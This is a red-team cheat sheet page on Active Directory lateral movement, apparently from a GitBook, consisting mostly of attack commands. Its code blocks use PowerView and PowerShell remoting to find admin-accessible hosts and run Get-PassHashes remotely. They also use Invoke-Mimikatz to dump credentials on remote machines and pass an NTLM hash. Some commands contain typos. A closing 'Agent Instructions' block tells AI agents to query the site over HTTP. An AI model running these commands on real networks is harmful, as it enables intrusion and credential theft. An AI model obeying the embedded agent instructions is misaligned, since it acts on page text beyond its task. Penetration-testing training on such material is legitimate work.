# Lateral Movement

## PowerView

```c
..\PowerView


#Find where you have localadminacces
Find-LocalAdminAccess


#Start Powershell Session on Server
Enter-PSSession -ComputerName <FQDN OF SERVER WITH AMDIN ACCESS>
whoami
whoami /priv
hostname


#Use different credentials:
Enter-PSSession -Credential <username> <password> -ComputerName <FQDN OF SERVER WITH AMDIN ACCESS>


#Create statefull Session
$sess = Enter-PSSession -ComputerName <FQDN OF SERVER WITH AMDIN ACCESS>
#see the session
$sess
#Enter the session
Enter-PSSession -Session $sess
#Exit the session
exit


```

### Executing Commands Remotely

```c
#Excute command on remote target with LocalAdminAccess
Invoke-Comman -ComputerName <FQDN OF SERVER WITH AMDIN ACCESS> -ScriptBlock{whoami;hostname}
Invoke-Comman -ComputerName <FQDN OF SERVER WITH AMDIN ACCESS> -ScriptBlock{Get-Process}


#Excute Scripts from Files
Invoke-Command –FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)


#Use below to execute locally loaded function on the remote machines:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)


#In this case, we are passing Arguments. Keep in mind that only positional arguments could be passed this way:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) -ArgumentList


Use below to execute "Stateful" commands using Invoke-Command :
$Sess = New-PSSession –Computername Server1 
Invoke-Command –Session $Sess –ScriptBlock {$Proc = Get-Process} 
Invoke-Command –Session $Sess –ScriptBlock {$Proc.Name}
```

### Invoke-Mimikatz

```c
#Dump credentials on a local machine.
Invoke-Mimikatz -DumpCreds


#Dump credentials on multiple remote machines.
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")


#Invoke-Mimikatz uses PowerShell remoting cmdlet Invoke-Command to
do above.


Over pass the hash" generate tokens from hashes.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rabakuku.gitbook.io/ad-red-team/ii.-local-privilege-escalation/lateral-movement.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.